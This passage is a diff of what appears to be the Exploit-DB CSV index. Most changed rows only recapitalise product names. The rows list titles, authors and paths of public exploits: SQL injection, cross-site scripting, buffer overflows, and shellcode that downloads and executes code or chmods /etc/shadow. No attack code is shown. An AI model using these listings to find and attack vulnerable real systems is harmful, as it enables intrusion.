Ethical Hacker Group",php,webapps,0 35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 @@ -32458,7 +32458,7 @@ id,file,description,date,author,platform,type,port 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 -36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 +36018,platforms/php/webapps/36018.txt,"Wordpress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 @@ -32471,33 +32471,33 @@ id,file,description,date,author,platform,type,port 36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 -36058,platforms/php/webapps/36058.txt,"WordPress Video Gallery 2.7.0 Plugin - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 +36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 Plugin - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Parameter Cross-Site Scripting",2011-08-08,darkTR,php,webapps,0 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 -36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 +36038,platforms/php/webapps/36038.txt,"Wordpress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 -36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Plugin - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 -36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 +36043,platforms/php/webapps/36043.rb,"Wordpress WP EasyCart Plugin - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 +36044,platforms/php/webapps/36044.txt,"PHP Flat File GuestBook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 36046,platforms/php/webapps/36046.txt,"phpWebSite - 'page_id' Parameter Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 36047,platforms/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusion",2011-08-15,muuratsalo,php,webapps,0 -36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",php,webapps,0 +36048,platforms/php/webapps/36048.txt,"phpList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",php,webapps,0 36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",windows,remote,0 -36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 Plugin - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 -36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36050,platforms/php/webapps/36050.txt,"Wordpress Fast Secure Contact Form 3.0.3.1 Plugin - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 +36051,platforms/php/webapps/36051.txt,"Wordpress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0 36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (2)",2015-02-11,"dogo h@ck",windows,local,0 -36054,platforms/php/webapps/36054.txt,"WordPress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 +36054,platforms/php/webapps/36054.txt,"Wordpress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 -36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 Plugin - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 +36061,platforms/php/webapps/36061.php,"Wordpress Webdorado Spider Event Calendar 1.4.9 Plugin - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 36064,platforms/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu - 'category.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps,0 @@ -32521,7 +32521,7 @@ id,file,description,date,author,platform,type,port 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 36086,platforms/php/webapps/36086.txt,"WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0 -36087,platforms/php/webapps/36087.txt,"WordPress Fancybox 3.0.2 Plugin - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 +36087,platforms/php/webapps/36087.txt,"Wordpress Fancybox 3.0.2 Plugin - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0 36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 36090,platforms/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,php,webapps,0 36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0 @@ -32562,10 +32562,10 @@ id,file,description,date,author,platform,type,port 36130,platforms/multiple/remote/36130.txt,"Spring Security - HTTP Header Injection",2011-09-09,"David Mas",multiple,remote,0 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0 -36411,platforms/win_x86/shellcode/36411.txt,"Windows XP x86-64 - Download & execute shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86,shellcode,0 +36411,platforms/win_x86/shellcode/36411.txt,"Windows XP x86-64 - Download & execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",win_x86,shellcode,0 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 -36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 +36135,platforms/php/webapps/36135.txt,"Wordpress Auctions Plugin 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Inclusion",2011-09-15,KedAns-Dz,php,webapps,0 36137,platforms/php/webapps/36137.txt,"PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 @@ -32573,7 +32573,7 @@ id,file,description,date,author,platform,type,port 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting",2011-09-19,"Gjoko Krstic",php,webapps,0 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 -36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local,0 +36143,platforms/osx/local/36143.txt,"Apple Mac OSX Lion - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injections",2011-09-19,Net.Edit0r,php,webapps,0 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 @@ -32591,12 +32591,12 @@ id,file,description,date,author,platform,type,port 36158,platforms/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos,0 36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 -36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80 +36161,platforms/php/webapps/36161.txt,"Wordpress Easy Social Icons Plugin 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80 36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 36163,platforms/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin - Slide Show Pages URI Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 -36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10 / WordPress 3.1.x / DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 +36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10 / Wordpress 3.1.x / DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0 @@ -32607,25 +32607,25 @@ id,file,description,date,author,platform,type,port 36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0 36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0 36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0 -36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36179,platforms/php/webapps/36179.txt,"WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36180,platforms/php/webapps/36180.txt,"WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36181,platforms/php/webapps/36181.txt,"WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36182,platforms/php/webapps/36182.txt,"WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36183,platforms/php/webapps/36183.txt,"WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting",2011-09-24,jabdah,php,webapps,0 -36184,platforms/php/webapps/36184.txt,"WordPress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 -36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36178,platforms/php/webapps/36178.txt,"Wordpress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36179,platforms/php/webapps/36179.txt,"Wordpress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36180,platforms/php/webapps/36180.txt,"Wordpress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36181,platforms/php/webapps/36181.txt,"Wordpress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36182,platforms/php/webapps/36182.txt,"Wordpress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36183,platforms/php/webapps/36183.txt,"Wordpress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting",2011-09-24,jabdah,php,webapps,0 +36184,platforms/php/webapps/36184.txt,"Wordpress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36185,platforms/php/webapps/36185.txt,"Wordpress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36186,platforms/php/webapps/36186.txt,"Wordpress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36187,platforms/php/webapps/36187.txt,"Wordpress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0 36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption PoC",2015-02-26,"Andras Kabai",linux,dos,0 -36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36191,platforms/php/webapps/36191.txt,"Wordpress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36192,platforms/php/webapps/36192.txt,"A2CMS - 'index.php' Local File Disclosure",2011-09-28,St493r,php,webapps,0 -36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 Plugin - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 +36193,platforms/php/webapps/36193.txt,"Wordpress WP Bannerize 2.8.7 Plugin - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps,0 -36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 Theme - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36196,platforms/php/webapps/36196.txt,"SonicWall Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection",2011-10-02,Rem0ve,php,webapps,0 +36195,platforms/php/webapps/36195.txt,"Wordpress Trending 0.1 Theme - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36196,platforms/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses - admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial Of Service",2011-10-01,"Usman Saeed",multiple,dos,0 36199,platforms/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0 @@ -32661,10 +32661,10 @@ id,file,description,date,author,platform,type,port 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0 -36230,platforms/php/webapps/36230.txt,"Calculated Fields Form WordPress Plugin 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 +36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 -36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 +36233,platforms/php/webapps/36233.txt,"Wordpress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Parameter Multiple SQL Injection",2011-10-14,m3rciL3Ss,php,webapps,0 @@ -32673,8 +32673,8 @@ id,file,description,date,author,platform,type,port 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 -36242,platforms/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,php,webapps,0 -36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar 1.1.4 Plugin - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 +36242,platforms/php/webapps/36242.txt,"Wordpress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,php,webapps,0 +36243,platforms/php/webapps/36243.txt,"Wordpress cp-multi-view-calendar 1.1.4 Plugin - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 36248,platforms/php/webapps/36248.txt,"osCommerce - Remote File Upload / File Disclosure",2011-10-20,indoushka,php,webapps,0 @@ -32697,12 +32697,12 @@ id,file,description,date,author,platform,type,port 36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps,0 -36271,platforms/osx/dos/36271.py,"Apple Mac OS X 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 +36271,platforms/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 36272,platforms/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusion",2011-11-01,indoushka,php,webapps,0 -36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 +36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 -36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 +36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injection",2011-11-02,"High-Tech Bridge SA",php,webapps,0 @@ -32712,7 +32712,7 @@ id,file,description,date,author,platform,type,port 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36285,platforms/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 -36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 +36287,platforms/php/webapps/36287.txt,"Wordpress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 36288,platforms/multiple/dos/36288.php,"Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 @@ -32726,7 +32726,7 @@ id,file,description,date,author,platform,type,port 36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 -36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 Plugin - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 